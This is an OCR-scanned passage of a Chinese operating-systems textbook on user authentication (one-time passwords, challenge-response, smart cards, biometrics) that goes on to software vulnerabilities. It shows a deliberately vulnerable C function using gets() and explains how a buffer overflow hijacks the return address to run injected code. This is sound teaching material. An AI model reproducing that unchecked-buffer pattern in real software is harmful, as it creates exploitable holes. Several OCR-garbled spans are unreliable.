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密码 服务 器 首先 由 Po 进行 初始 化 ， 即 f (P1)。 这 一 值 连同 登录 用 户 名 和 整数 1 被 存放 在 密码 文件 的 相 
应 条 目 里 。 整 数 1 表示 下 一 个 所 需 的 密码 是 P,。 当 用 户 第 一 次 登录 时 ， 他 首先 把 自己 的 登录 名 发 送 到 服 
务 器 ， 服 务 器 回复 密码 文件 里 的 整数 值 1。 用 户 机 器 在 本 地 对 所 输入 的 s 进 行 运算 得 到 Pl。 随 后 服务 器 根 
据 P, 计 算出 f (P1)， 并 将 结果 同 密码 文件 里 的 (P0) 进 行 比较 。 如 果 符 合 ， 登 录 被 允许 。 这 时 ， 整 数 被 增加 
到 2， 在 密码 文件 中 Pl 覆盖 了 Po。。 如 果 值 匹配 ， 则 允许 登录 ， 整 数 增加 到 2，P, 会 覆盖 密码 文件 中 的 Ph。 

下 一 次 登录 时 ， 服 务 器 把 整数 2 发 送 到 用 户 计算 机 ， 用 户 机 器 计算 出 P,。 然 后 服务 器 计算 RP,) 的 值 
并 将 其 与 密码 文件 中 存放 的 值 进行 比较 。 如 果 两 者 匹配 ， 就 允许 登录 。 这 时 整数 "被 增加 到 3 ， 密 码 文件 
中 由 已 覆盖 已 。 这 一 机 制 的 特性 保证 了 即使 人 侵 者 可 以 窃取 已 也 无 法 从 P 计 算出 P， 而 只 能 计算 出 P-， 
但 P-, 已 经 使 用 过 ， 现 在 失效 了 。 当 所 有 7 个 密码 都 被 用 完 时 ， 服 务 器 会 重新 初始 化 一 个 密 钥 。 

4. 挑战 -响应 认证 

另 一 种 密码 机 制 是 让 每 一 个 用 户 提供 一 长 串 问 题 并 把 它们 安全 地 放 在 服务 器 中 (如 可 以 用 加 密 形 
问题 是 用 户 自选 的 并 且 不 用 写 在 纸 上 。 下 面 是 用 户 会 被 问 到 的 问题 : 

1) 谁 是 Marjolein 的 姐妹 ? 

2) 你 的 小 学 在 哪 一 条 路 上 ? 

3) Ellis 女 士 教 什么 课 ? 

在 登录 时 ， 服 务 器 随机 提问 并 验证 答案 。 要 使 这 种 方法 有 效 ， 就 要 提供 尽 可 能 多 的 问题 和 答案 。 
另 一 种 方法 叫 作 挑战 -响应 。 使 用 这 种 方法 时 ， 在 登录 为 用 户 时 用 户 选择 某 一 种 运算 ， 例 如 妇 。 当 
用 户 登 录 时 ， 服 务 器 发 送 给 用 户 一 个 参数 ， 假 设 是 7， 在 这 种 情形 下 ， 用 户 就 输入 49。 这 种 运算 方法 可 
以 每 周 、 每 天 后 者 从 早 到 晚 经 常 变化 。 

如 果 用 户 的 终端 设备 具有 十 分 强大 的 运算 能 力 ， 如 个 人 计算 机 、 个 人 数字 助理 或 手机 ， 那 么 就 可 以 
使 用 更 强大 的 挑战 响应 方法 。 过 程 如 下 : 用 户 事先 选择 密 钥 上， 并 手工 放置 到 服务 器 中 。 密 钥 的 备份 也 
被 安全 地 存放 在 用 户 的 计算 机 里 。 在 登录 时 ， 服 务 器 把 随机 产生 的 数 r 发 送 到 用 户 端 ， 由 用 户 端 计算 出 
fr, ORME. HR, f 是 一 个 公开 已 知 的 函数 。 然 后 ， 服 务 器 也 做 同样 的 运算 看 看 结果 是 否 一 致 。 这 种 方 
法 的 优点 是 即使 窗 昕 者 看 到 并 记录 下 双方 通信 的 信息 ， 也 对 他 毫 无 用 处 。 当 然 ， 函 数 /需要 足够 复杂 ， 
以 保证 k 不 能 被 逆 推 。 加 密 散 列 函数 是 不 错 的 选择 ，r 与 k 的 异 或 值 (XOR) 作为 该 函数 的 一 个 参数 。 和 这 
今 为 止 ， 这 样 的 函数 仍然 被 认为 是 难以 逆 推 的 。 


9.6.1 使 用 物理 识别 的 认证 方式 

用 户 认证 的 第 二 种 方式 是 验证 一 些 用 户 所 拥有 的 实际 物体 而 不 是 用 户 所 知道 的 信息 。 如 金属 钥匙 就 
被 使 用 了 好 几 个 世纪 。 现 在 ， 人 们 经 常 使 用 磁卡 ， 并 把 它 放 入 与 终端 或 计算 机 相连 的 读 卡 器 中 。 而 且 一 
般 情况 下 ， 用 户 不 仅 要 插 卡 ， 还 要 输入 密码 以 保护 别人 冒 用 遗失 或 偷 来 的 磁卡 。 银 行 的 ATM 机 (自动 取 
款 机 ) 就 采用 这 种 方法 让 客户 使 用 磁卡 和 密码 码 (现在 大 多 数 国家 用 4 位 的 PIN 代 码 ， 这 主要 是 为 了 减少 
ATM 机 安装 计算 机 键盘 的 费用 ) 通过 远程 终端 (ATM 机 ) 登录 到 银行 的 主机 上 。 

载 有 信息 的 磁卡 有 两 种 : 磁 条 卡 和 芯片 卡 。 磁 条 卡 后 面 粘 附 的 磁 条 上 可 以 写 入 存放 140 个 字 节 的 信 
息 。 这 些 信息 可 以 被 终端 读 出 并 发 送 到 主机 。 一 般 这 些 信息 包括 用 户 密码 (如 PIN 代码 ) 这 样 终端 即便 
在 与 银行 主机 通信 断 开 的 情况 下 也 可 以 校 验 。 通 常 ， 用 只 有 银行 已 知 的 密 钥 对 密码 进行 加 密 。 这 些 卡片 
每 张 成 本 大 约 在 0.1 美 元 到 0.5 美 元 之 间 ， 价 格 差异 主要 取决 于 卡片 前 面 的 全 息 图 像 和 生产 量 。 在 鉴别 用 
户 方面 ， 磁 条 卡 有 一 定 的 风险 。 因 为 读 写 卡 的 设备 比较 便宜 并 被 大 量 使 用 着 。 

而 芯片 卡 在 卡片 上 包含 了 小 型 集成 电路 。 这 种 卡 又 可 以 被 进一步 分 为 两 类 : 储 值 卡 和 智能 卡 。 储 值 卡 
包含 了 一 定数 量 的 存 贮 单元 (通常 小 于 1KB)， 它 使 用 ROM 技 术 保 证 数据 在 断 电 和 离开 读 写 设备 后 也 能 够 
保持 记忆 。 不 过 在 卡片 上 没有 CPU， 所 以 被 存储 的 信息 只 有 外 部 的 CPU ( 读 卡 器 中 ) 才能 改变 。 储 值 卡 被 
大 量 生 产 ， 使 得 每 张 成 本 可 以 低 于 1 美元 ， 如 电话 预付 费 卡 等 。 当 人 们 打 电话 时 ， 卡 里 的 电话 费 被 扣除 ， 但 
实际 上 并 没有 发 生 资 金 的 转移 。 由 于 这 个 原因 ， 这 类 卡 仅仅 由 一 家 公司 发 售 并 只 能 用 于 一 种 读 卡 器 (如 电 
话机 或 自动 售 货 机 )。 当 然 也 可 以 存储 1KB 信 息 的 密码 并 通过 读 卡 机 发 送 到 主机 验证 ， 但 很 少 有 人 这 么 做 。 

近来 拥有 更 安全 特性 的 是 智能 卡 。 智 能 卡通 常 使 用 MHz 8 位 CPU,16KB ROM, 4 KB ROM，512B 可 
擦 写 RAM 以 及 9600b/s 与 读 卡 器 之 间 的 通信 速率 。 这 类 卡 制作 越 来 越 小 巧 ， 但 各 种 参数 却 不 尽 相 同 。 这 
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HER AE HR (BARAT RHE). OCHRE ( 当 用 户 弯 折 卡 时 芯片 不 会 受 损 ) 和 成 本 (通常 
从 1 美元 到 20 美 元 一 张 不 等 ， 取 决 于 CPU 功 率 、 存 储 大 小 以 及 是 否 有 密码 协 处 理 器 )。 

智能 卡 可 用 来 像 储 值 卡 一 样 储 值 ， 但 却 具有 更 好 的 安全 性 和 更 广泛 的 用 途 。 用 户 可 以 在 ATM 机 上 或 
通过 银行 提供 的 特殊 读 卡 器 连接 到 主机 取 钱 。 用 户 在 商家 把 卡 插入 读 卡 器 后 ， 可 以 授权 卡片 进行 一 定数 
量 金额 的 转账 (输入 YES 后 )。 卡 片 将 一 段 加 密 过 的 信息 发 送 到 商家 ， 商 家 稍 后 将 信息 流转 到 银行 扣除 
所 付 金 额 的 信用 。 

与 信用 卡 或 借 记 卡 相 比 , 智能 卡 的 最 大 优点 是 无 须 直接 与 银行 联机 操作 。 如 果 读 者 不 相信 这 个 优点 ， 
可 以 尝试 下 面 的 实验 。 在 商店 里 买 一 块 糖果 并 坚持 用 信用 卡 结账 。 如 果 商 家 反对 ， 你 就 说 身边 没有 现金 
而 且 你 希望 增加 飞行 里 数 。。 你 将 发 现 商家 对 你 的 想法 毫 无 热情 (因为 使 用 信用 卡 的 相关 成 本 会 使 获得 
的 利润 相形 见 纳 )。 所 以 ， 在 商店 为 少量 商品 付款 、 付 电话 费 、 停 车 费 、 使 用 自动 售 货 机 以 及 其 他 许多 
需要 使 用 硬币 的 场合 下 ， 智 能 卡 是 十 分 有 用 的 。 在 欧洲 ， 智 能 卡 被 广泛 使 用 并 逐渐 推广 到 其 他 地 区 。 

智能 卡 有 许多 其 他 的 潜在 用 途 (例如 ， 将 持 卡 人 的 过 敏 反 应 以 及 其 他 医疗 状况 以 安全 的 方式 编码 ， 
供 紧急 时 使 用 ) ， 但 本 书 并 不 是 讲 故事 的 ， 我 们 的 兴趣 在 于 智能 卡 如 何 用 于 安全 登录 认证 。 其 基本 概念 
很 简单 : 智能 卡 非常 小 ， 卡 片上 有 可 携带 的 微型 计算 机 与 主机 进行 交谈 ( 称 作协 议 ) 并 验证 用 户 身份 。 
如 用 户 想 要 在 电子 商务 网 站 上 买 东西 时 ， 可 以 把 智能 卡 插 入 家 里 与 PC 相连 的 读 卡 器 。 电 子 商务 网 站 不 仅 
可 以 比 用 密码 更 安全 地 通过 智能 卡 验证 用 户 身份 ， 还 可 以 在 卡 上 直接 扣除 购买 商品 的 金额 ， 减 少 了 网 站 
为 用 户 能 够 使 用 联机 信用 卡 进行 消费 而 付出 的 大 量 成 本 (以 及 风险 )。 

智能 卡 可 以 使 用 不 同 的 验证 机 制 。 一 个 简单 的 挑战 -响应 的 例子 是 这 样 的 ,首先 服务 器 向 智能 卡 发 
出 512 位 随机 数 ， 智 能 卡 接着 将 随机 数 加 上 存储 在 卡 上 EEPROM 中 的 512 位 用 户 密码 。 然 后 对 所 得 的 和 进 
行 平 方 运算 ， 并 且 把 中 间 的 512 位 数字 发 送 回 服务 器 ， 这 样 服务 器 就 知道 了 用 户 的 密码 并 且 可 以 计算 出 
该 结果 值 正确 与 否 。 整 个 过 程 如 图 9-19 所 示 。 如 果 窃 听 者 看 到 了 双方 的 信息 ， 他 也 无 从 采用 ， 即 便 记 录 
下 来 今后 也 没有 用 处 ， 因 为 下 一 次 登录 时 ， 服 务 器 会 发 出 另 一 个 512 位 的 随机 数 。 当 然 ， 我 们 可 以 使 用 
更 加 新 的 算法 而 不 是 简单 的 平方 运算 。 


远程 计算 机 







1. 把 挑战 发 送 给 智能 卡 
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图 9-19 使 用 智能 卡 的 认证 


任何 固定 的 密码 通信 协议 的 缺点 是 容易 在 传输 过 程 中 损坏 ， 从 而 使 智能 卡 丧 失 功 能 。 避 免 这 种 情况 
的 一 个 办 法 是 在 卡片 里 使 用 ROM 而 不 是 密码 通信 协议 ， 如 Java 解 释 程 序 。 然 后 将 用 Java 二 进 制 语言 写成 
的 通信 协议 下 载 到 卡片 中 ， 并 解释 运行 。 通 过 这 种 方法 ， 即 使 协议 被 损坏 ， 也 能 够 在 全 球 范围 内 方便 地 
下 载 一 个 新 的 协议 ， 使 得 下 一 次 使 用 智能 卡 时 ， 该 协议 处 于 完好 的 状态 。 这 种 方法 的 缺点 是 让 本 来 就 速 
度 慢 的 智能 卡 更 慢 了 ， 但 是 随 着 技术 的 发 展 这 种 方法 将 被 广泛 使 用 。 智 能 卡 的 另 一 个 缺点 是 丢失 或 被 次 
的 卡片 可 以 让 不 法 分 子 实施 旁 道 攻击 (side-channel attack) ， 例 如 功率 分 析 攻 击 。 他 们 中 的 专家 通过 观 
察 智 能 卡 在 执行 加 密 操 作 时 的 电源 功率 损耗 ， 可 以 运用 适当 的 设备 推算 出 密 钥 。 也 可 以 让 智能 卡 对 特定 
的 密 钥 进 行 加 密 操作 ， 从 加 密 的 时 间 来 推算 出 卡片 密 钥 的 有 关 信 息 。 


日 飞行 里 数 卡 是 信用 卡 的 一 种 ， 通 过 这 类 信用 卡 结账 时 ， 可 以 将 消费 的 金额 换算 成 航班 的 飞行 里 数 ， 消 费 到 
一 定金 额 时 ， 可 能 兑换 免费 机 票 。 一 一 译 者 注 
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9.6.2 使 用 生物 识别 的 认证 方式 

第 三 种 方法 是 对 用 户 的 某 些 物理 特征 进行 验证 ， 并 且 这 些 特 征 很 难 伪 造 。 这 种 方法 叫 作 生物 识别 
(Pankanti 等 人 , 2000) 。 如 接 通 在 电脑 上 的 指纹 或 声音 识别 器 可 以 对 用 户 身份 进行 校 验 。 

一 个 典型 的 生物 识别 系统 由 两 部 分 组 成 : 注册 部 分 和 识别 部 分 。 在 注册 部 分 中 ， 用 户 的 特征 被 数字 
化 储存 ， 并 把 最 重要 的 识别 信息 抽取 后 存放 在 用 户 记 录 中 。 存 放 方 式 可 以 是 中 心 数据 库 (如 用 于 远程 计 ” 
算 机 登录 的 数据 库 ) 或 用 户 随身 携带 的 智能 卡 并 在 识别 时 插入 远程 读 卡 器 (如 ATM 机 ) 。 

另 一 个 部 分 是 识别 部 分 。 在 使 用 时 ， 首 先 由 用 户 输入 登录 名 ， 然 后 系统 进行 识别 。 如 果 识 别 到 的 信 
息 与 注册 时 的 样本 信息 相同 ， 则 人 允许 登录 ， 否 则 就 拒绝 登录 。 这 时 仍然 需要 使 用 登录 名 ， 因 为 仅仅 根据 
检测 到 的 识别 信息 来 判断 是 不 严格 的 ， 只 有 识别 部 分 的 信息 会 增加 对 识别 信息 的 排序 和 检索 难度 。 也 许 
某 两 个 人 会 具有 相同 的 生物 特征 ， 所 以 要 求生 物 特征 还 要 匹配 特定 用 户 身份 的 安全 性 比 只 要 求 匹配 一 般 
用 户 的 生物 特征 要 强 得 多 。 

被 选用 的 识别 特征 必须 有 足够 的 可 变性 ， 这 样 系统 可 以 准确 无 误 地 区 分 大 量 的 用 户 。 例 如 ， 头 发 颜 
色 就 不 是 一 个 好 的 特征 ， 因 为 许多 人 都 拥有 相同 颜色 的 头发 。 而 且 ， 被 选用 的 特征 不 应 该 经 常 发 生变 化 
(对 于 一 些 人 而 言 ， 头 发 并 不 具有 这 个 特性 ) 。 例 如 ， 人 的 声音 由 于 感冒 会 变化 ， 而 人 的 脸 会 由 于 留 胡 子 
或 化 妆 而 与 注册 时 的 样本 不 同 。 既 然 样本 信息 永远 也 不 会 与 以 后 识别 到 的 信息 完全 符合 ， 那 么 系统 设计 
人 员 就 要 决定 识别 的 精度 有 多 大 。 在 极端 情况 下 ， 设 计 人 员 必 须 考虑 系统 也 许 不 得 不 偶尔 拒绝 一 个 合法 
FAP, 但 恰巧 让 一 个 乔装 打扮 者 进入 系统 。 对 电子 商务 网 站 来 说 ， 拒 绝 一 名 合法 用 户 比 遭受 一 小 部 分 诈 
骗 的 损失 要 严重 得 多 ， 而 对 核武 器 网 站 来 说 ， 拒 绝 正式 员工 的 到 访 比 让 陌生 人 一 年 进入 几 回 要 好 得 多 。 

现在 让 我 们 来 看 一 看 实际 应 用 的 一 些 生 物 识别 方式 。 一 个 令 人 有 些 惊奇 的 方式 是 使 用 手指 长 短 进行 
识别 。 在 使 用 该 方法 时 ， 每 一 个 终端 都 有 如 图 9-20 所 示 的 装置 。 

用 户 把 手 插 进 装置 里 ， 系 统 就 会 对 手指 的 长 短 进行 测量 并 与 数据 弹簧 
库 里 的 样本 进行 核对 。 压力 板 

然而 ， 手 指 长 度 识别 并 不 是 令 人 满意 的 方式 。 系 统 可 能 遭 
受 手指 石膏 模型 或 其 他 仿制 品 的 攻击 ， 也 许 入 侵 者 还 可 以 调节 
手指 的 长 度 以 便 进行 实验 。 

另 一 种 目前 被 广泛 应 用 于 商业 的 生物 识别 模式 是 虹膜 识别 
技术 。 任 何 两 个 人 都 具有 不 同 的 视网膜 组 织 血管 (patterns)， 即 
使 是 同 卵 双胞胎 也 不 例外 ， 因 此 虹膜 识别 与 指纹 识别 同样 可 靠 ， 

而 且 更 加 容易 实现 自动 化 (Daugman, 2004) 。 用 户 的 视网膜 可 

以 由 一 米 以 外 的 照相 机 拍照 并 通过 gabor 小 波 (gabor wavelet) 

变换 的 方式 提取 某 些 特征 信息 ， 并 且 将 结果 压缩 为 236 字 节 。 该 

结果 在 用 户 登录 的 时 候 与 现场 采样 结果 进行 比较 ， 如 果 两 者 的 。 图 9-20 一 种 测量 手指 长 度 的 装置 
汉 明 距离 (hamming distance) 小 于 某 个 闪 值 ， 则 该 用 户 通过 验 

证 (两 个 比特 字 串 之 间 的 汉 明 距离 指 从 一 个 比特 串 变 换 为 另 一 个 比特 串 最 少 需要 变化 的 比特 数 ) 。 

还 有 一 种 依靠 迷你 装置 识别 的 技术 是 声音 测定 (Markowitz, 2000) 。 整 个 装置 只 需要 一 个 麦克 风 
(或 者 甚至 是 一 部 电话 ) 和 有 关 的 软件 即 可 。 声 音 测 定 技术 与 声音 识别 技术 不 同 。 后 者 是 为 了 识别 人 们 
说 了 些 什 么 ， 而 前 者 是 为 了 判断 人 们 的 身份 。 有 些 系统 仅仅 要 求 用 户 说 一 句 密码 ， 但 是 窃听 者 可 以 把 这 
句 话 录 下 来 ， 通 过 回放 来 进入 系统 。 更 先进 的 系统 向 用 户 说 一 些 话 并 要 求 重 述 ， 用 户 每 次 登录 叙述 的 都 
是 不 同 的 语句 。 有 些 公 司 开始 在 软件 中 使 用 声音 测定 技术 ， 如 通过 电话 线 连 接 使 用 的 家 庭 购 物 软 件 。 在 
这 种 情况 下 ， 声 音 测 定 比 用 PIN 密码 要 安全 得 多 。 声 音 测 定 可 以 结合 其 他 生物 测定 方式 (如 脸 部 识别 ) 
来 达到 更 高 的 精确 度 (Tresadern 等 人 ，2013)。 

我 们 可 以 继续 给 出 许多 例子 ， 但 是 有 两 个 例子 特别 有 助 于 我 们 理解 。 猫 和 其 他 一 些 动物 通过 小 便 来 
划 定 自己 的 地 盘 。 很 明显 ， 猫 通过 这 种 方法 可 以 相互 识别 自己 的 家 。 假 设 某 人 拿 着 一 个 可 以 进行 尿 液 分 
析 的 装置 ， 那 么 他 就 可 以 建立 识别 样本 。 每 个 终端 都 可 以 有 这 样 的 装置 ， 装 置 前 放 着 一 条 标语 :“ 要 登 
录 系 统 ， 请 留 下 样本 。” 这 也 许 是 一 个 绝对 无 法 攻破 的 系统 ， 但 用 户 可 能 难以 接受 使 用 这 样 的 系统 。 
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如 果 本 书 的 早期 版 本 中 出 现 了 上 述 段落 的 内 容 ， 它 可 能 会 被 当成 笑话 ， 而 如 今 这 已 不 是 笑谈 。 在 生 
活 模仿 艺术 (或 者 说 生活 模仿 教科 书 ? ) 的 例子 中 ， 研 究 人 员 现在 已 经 开发 出 可 以 用 作 生 物 特 征 的 气味 
识别 系统 (Rodriguez-Lujan 等 人 ，2013 ) 。 下 一 步 是 气味 视觉 混合 识别 (Smell-O-Vision) 吗 ? 

在 使 用 指纹 识别 装置 和 小 型 谱 仪 时 也 可 能 发 生 同 样 的 潜在 情况 。 用 户 会 被 要 求 按 下 大 拇指 并 抽取 一 
滴 血 进行 化 验 分 析 。 到 目前 为 止 没 人 发 表 过 相关 材料 ， 但 是 有 将 血管 成 像 作为 生物 特征 的 研究 (Fuksis 
等 人 ，2011 ) 。 

我 们 的 观点 是 任何 身份 验证 方案 必须 是 用 户 心理 上 可 以 接受 的 。 测 量 手指 长 度 可 能 不 会 造成 任何 问 
题 ， 但 是 像 线 上 存储 指纹 这 种 东西 〈 即 使 是 非 侵入 性 的 ) 对 许多 人 来 说 可 能 就 是 不 可 接受 的 ， 因 为 它们 
将 指纹 与 犯罪 分 子 相 关联 。 不 过 ， 苹 果 在 iPhone 5S 上 推出 了 这 项 技术 。 


9.7 软件 漏洞 

入 侵 用 户 计算 机 的 主要 方法 之 一 是 利用 系统 中 所 运行 的 软件 的 漏洞 ， 使 其 做 一 些 违背 程序 员 本 意 的 
事情 。 例 如 ， 一 种 常见 的 攻击 是 通过 强迫 下 载 (drive-by-download) 手段 来 感染 用 户 的 浏览 器 。 在 这 种 
攻击 中 ， 网 络 罪犯 通过 在 Web 服 务 器 上 放置 恶意 内 容 来 感染 用 户 浏览 器 。 有 时 候 这 些 恶 意 程序 完全 由 攻 
击 者 运行 ， 这 种 情况 下 攻击 者 要 寻找 吸引 用 户 浏览 他 们 网 页 的 方法 (承诺 给 用 户 免费 的 软件 或 者 电影 可 
能 奏效 ) 。 然 而 ， 攻 击 者 也 可 能 将 恶意 内 容 放 在 合法 的 网 站 上 (例如 通过 广告 和 讨论 板 的 形式 ) 。 不 久 前 ， 
在 迈阿密 海豚 队 (Miami Dolphins, HESR) 主场 举办 今年 最 受 期 待 的 体育 赛事 超级 碗 的 前 几 天 ， 他 
们 的 网 站 遭 到 了 这 种 方式 的 攻击 。 由 于 在 赛事 的 前 几 天 该 网 站 非常 受 欢迎 ， 从 而 导致 许多 用 户 被 感染 。 
在 强迫 下 载 初始 的 感染 程序 之 后 ， 浏 览 器 中 攻击 者 的 代码 开始 运行 并 下 载 真正 的 僵尸 软件 (恶意 软件 ) ， 
然后 执行 它 并 确保 其 在 系统 每 次 启动 时 开始 运行 。 

由 于 本 书 是 一 本 关于 操作 系统 的 书 ， 关 注 点 是 恶意 应 用 如 何 破坏 操作 系统 ， 因 此 许多 利用 软件 漏洞 
攻击 网 站 和 数据 库 的 方法 不 属于 本 书 关心 的 范畴 。 一 个 典型 的 例子 是 有 人 发 现 操作 系统 中 的 一 个 漏洞 ， 
然后 利用 它 运行 有 错误 的 代码 来 损坏 计算 机 。 强 迫 下 载 并 不 完全 属于 这 种 情形 ， 但 是 利用 程序 中 的 漏洞 
而 进行 攻击 的 方法 在 内 核 中 也 是 常见 的 。 

在 刘易斯 卡 洛 尔 (Lewis Caroll) 的 著作 《爱丽 丝 镜 中 奇遇 记 》 (Through the Looking Glass) 中 ， 
红 皇 后 带 着 爱丽 丝 疯狂 地 奔跑 。 她 们 竭尽 全 力 ， 但 是 无 论 跑 得 多 快 ， 还 是 被 困 在 同一 个 地 方 。 爱 丽 丝 说 : 
“在 我 们 的 国家 ， 如 果 像 这 样 一 直 快 跑 ， 那 么 通常 可 以 到 达 别 的 地 方 。” 皇 后 说 :“ 你 看 ， 现 在 你 尽 全 力 
奔跑 ， 来 使 自己 能 够 停留 在 某 一 个 位 置 。 如 果 你 想到 达 其 他 地 方 ， 就 必须 以 至 少 两 倍 的 速度 跑 ! ” 

红 皇 后 效应 是 典型 的 进化 军备 竞赛 。 在 过 去 的 几 百 万 年 中 ,斑马 和 狮子 的 祖先 都 进化 了 。 斑 马 跑 得 
更 快 也 有 更 敏锐 的 视觉 、 听 觉 和 嗅觉 来 发 现 食肉 动物 ， 这 对 于 躲避 狮子 很 有 有用。 但 与 此 同时 ， 狮 子 也 变 、 
得 更 快 、 更 强壮 、 更 健康 、 更 擅长 隐匿 ， 这 些 进 化 对 于 捕食 斑马 有 很 大 的 作用 。 所 以 ， 虽 然 狮 子 和 斑马 
都 “改善 了 ”自己 的 设计 ， 但 是 它们 并 没有 在 捕食 关系 中 获得 更 大 的 成 功 ， 而 是 仍 要 在 野外 努力 求生 。 
红 皇 后 效应 也 适用 于 漏洞 攻击 。 为 了 应 对 日 益 先 进 的 安全 措施 ， 攻 击 手段 也 变 得 越 来 越 复杂 。 

虽然 每 一 个 漏洞 都 与 特定 程序 中 的 缺陷 相关 ， 但 总 有 几 类 漏洞 经 常 发 生 ， 它 们 值得 我 们 研究 以 理解 
攻击 是 如 何 奏效 的 。 在 接 下 来 的 几 节 中 ， 我 们 不 仅 会 对 这 些 手 段 进行 研究 ， 而 且 会 介绍 阻止 、 避 免 这 些 
攻击 的 对 策 ， 同 时 也 会 介绍 一 些 对 抗 措施 以 应 对 这 些 把 戏 。 这 将 为 你 提供 关于 攻击 者 与 防御 者 的 军备 竞 
赛 的 有 益 思路 一 一 就 像 与 红 皇 后 跑步 一 样 。 

首先 ， 我 们 从 古老 的 缓冲 区 溢出 开始 讨论 ， 这 是 计算 机 安全 史上 最 重要 的 漏洞 利用 技术 之 一 。 这 项 
技术 被 用 在 Robert Morris Jr. 于 1988 年 编写 的 第 一 个 网 络 仆 虫 中 ， 并 且 至 今 仍 被 广泛 使 用 。 对 于 这 种 技术 
我 们 已 经 拥有 很 多 的 应 对 措施 ， 然 而 ， 研 究 者 们 预测 缓冲 区 溢出 仍 将 存在 很 长 一 段 时 间 (Van der Veen, 
2012)。 针 对 缓冲 区 溢出 ， 我 们 会 介绍 三 个 在 大 多 数 现代 系统 中 最 重要 的 保护 机 制 ， 栈 金 丝 兴 保 护 ， 数 
据 执 行 保护 ， 地 址 空间 布局 随机 化 。 之 后 ， 我 们 将 介绍 其 他 漏洞 利用 技术 ， 例 如 格式 化 字符 串 攻 击 、 整 
数 溢出 、 甚 挂 指针 漏洞 等 。 所 以 请 做 好 准备 并 带 上 你 的 黑 帽 子 1 


9.7.1 缓冲 区 溢出 攻击 
几乎 所 有 操作 系统 和 大 部 分 应 用 程序 都 是 用 C 语 言 或 C++ 语言 编写 的 (因为 程序 员 钟 爱 它 们 ， 它 们 
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能 够 被 编译 为 十 分 高 效 的 目标 代码 )， 因 此 它们 成 为 很 多 攻击 的 源头 。 遗 憾 的 是 ，C 和 C++ 的 编译 器 都 没 
有 数组 边界 检查 。 举 例 来 说 ，C 语 言 库 中 的 gets 函 数 臭名 昭著 ,该 函数 读 取 一 个 字符 串 (大 小 未 知 ) 到 
一 个 固定 大 小 的 缓冲 区 中 ， 但 是 不 进行 溢出 检查 ， 这 个 函数 很 容易 成 为 缓冲 区 溢出 攻击 的 目标 (一些 编 
译 器 甚至 能 探测 到 gets 函 数 的 使 用 并 做 出 警告 )。 所 以 ， 以 下 的 代码 也 没有 进行 检查 : 


01. void A() { 

02. char B[128); /* 在 栈 中 预 留 128 字 节 给 缓冲 区 */ 

03. printf ("Type log message:"); 

04. gets (B); /* 从 标准 输入 读 日 志 信 息 到 缓冲 区 B */ 

05. writeLog (B); 1 以 特定 格式 化 方式 将 字符 串 输出 到 日 志文 件 */ 


06. } 


函数 A 代表 一 个 简化 版 的 日 志 过 程 。 每 次 执行 时 会 让 用 户 输入 日 志 信 息 ， 然 后 使 用 C 语 言 库 中 的 gets 
函数 来 读 取 缓 存 区 B 中 的 所 有 内 容 ， 而 不 考虑 用 户 输 入 的 是 什么 。 最 终 ， 它 调用 whritelog 函 数 ， 以 特定 
的 格式 化 方式 将 字符 串 输出 到 日 志文 件 (也 许 会 添加 日 期 和 时 间 以 便 为 之 后 更 好 地 搜索 日 志 做 准备 )。 
假设 函数 A 是 特权 进程 中 的 一 部 分 ， 例 如 该 进程 是 SETUID 函 数 。 攻 击 者 如 果 能 够 控制 这 种 进程 ， 就 相 
当 于 拥有 了 root 权 限 。 

虽然 并 不 明显 ,但 上 述 代 码 有 一 个 严重 的 错误 。 造 成 这 个 问题 的 原因 是 gets 函 数 会 一 直 读 取 标准 输 
人 的 字符 ， 直 到 碰 到 换行 符 。 它 不 知道 缓冲 区 B 只 能 装载 128 字 节 的 数据 。 假 设 用 户 输入 了 256 个 字符 ， 
多 出 来 的 128 个 字 节 会 发 生 什 么 ”因为 gets 函 数 不 检 查 缓冲 区 边界 ， 所 以 其 余 的 字 节 也 会 被 存储 在 栈 中 ， 
就 像 缓冲 区 有 256 字 节 一 样 。 这 样 一 来 ， 原 本 存储 在 这 些 区 域 中 的 内 容 就 被 覆盖 掉 了 ， 其 后 果 通 常 是 灾 
难 性 的 。 

在 图 9-21a 中 ， 主 程序 在 运行 时 ， 它 的 局 部 变量 存放 在 栈 中 。 在 某 个 节点 它 调用 了 函数 A， 如 图 
9-21b 所 示 。 标准 调用 序列 通过 将 返回 地 址 (指向 调用 后 的 指令 ) 推 至 栈 而 开始 运行 。 然 后 将 控制 转 为 A， 
将 栈 指针 减少 128 字 节 来 为 局 部 变量 分 配 存储 空间 (缓冲 区 B)。 


虚拟 地 址 空间 虚拟 地 址 空间 虚拟 地 址 空间 





图 9-21 a) 主 程序 运行 时 的 情形 ，b) 进程 A 被 调用 后 的 情形 ，c) 缓冲 区 溢出 用 灰色 表示 


所 以 如 果 用 户 输入 超过 128 个 字 节 究竟 会 发 生 什么 ?图 9-21c 展 示 了 这 种 情况 。 前 面 提 到 ，gets 函 数 
复制 所 有 字 节 填充 至 缓存 区 并 导致 溢出 ， 这 可 能 会 在 栈 中 重 写 很 多 内 容 ， 但 是 返回 地 址 会 首先 被 覆盖 。 
换 句 话说 ， 某 些 日 志 项 所 填充 的 位 置 是 系统 假定 存放 指令 地 址 的 位 置 ， 而 这 一 地 址 恰好 是 函数 返回 时 将 
跳 转 到 的 位 置 。 在 用 户 输入 的 常规 日 志 信息 中 ， 很 可 能 含有 无 效 的 地 址 字符 。 因 此 一 旦 函数 A 返 回 ， 程 
序 就 将 试 着 跳 转 到 无 效 目标 一 一 这 是 任何 系统 都 不 希望 发 生 的 。 在 多 数 的 情况 下 ， 程 序 会 马上 崩 福 。 

现在 假设 并 不 是 某 个 善良 的 用 户 冒 失地 输入 了 过 长 的 信息 ， 而 是 攻击 者 在 别有用心 地 破坏 程序 的 控 
制 流 。 也 就 是 说 ， 攻 击 者 提供 了 一 个 精心 准备 的 输入 ， 利 用 缓冲 区 B 的 地 址 来 重 写 返回 地 址 。 结 果 就 是 ， 
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从 函数 A 返回 后 ， 程 序 会 跳 转 至 缓冲 区 B 的 开头 ， 并 且 将 执行 里 面 的 代码 。 因 为 攻击 者 控制 了 缓冲 区 的 
内 容 ， 所 以 他 可 以 利用 机 器 指令 填充 该 缓冲 区 ， 并 在 原始 程序 的 上 下 文中 执行 攻击 代码 。 实 际 上 ， 攻 击 
者 用 自己 的 代码 覆盖 了 内 存 并 使 其 得 以 执行 。 该 程序 现在 完全 处 于 攻击 者 的 控制 之 下 ， 他 可 以 为 所 欲 为 。 
通常 情况 下 ， 攻 击 者 代码 用 于 启动 壳 (例如 通过 exec 系 统 调用 ) ， 使 和 人 侵 者 可 以 方便 地 访问 机 器 。 因 此 ， 
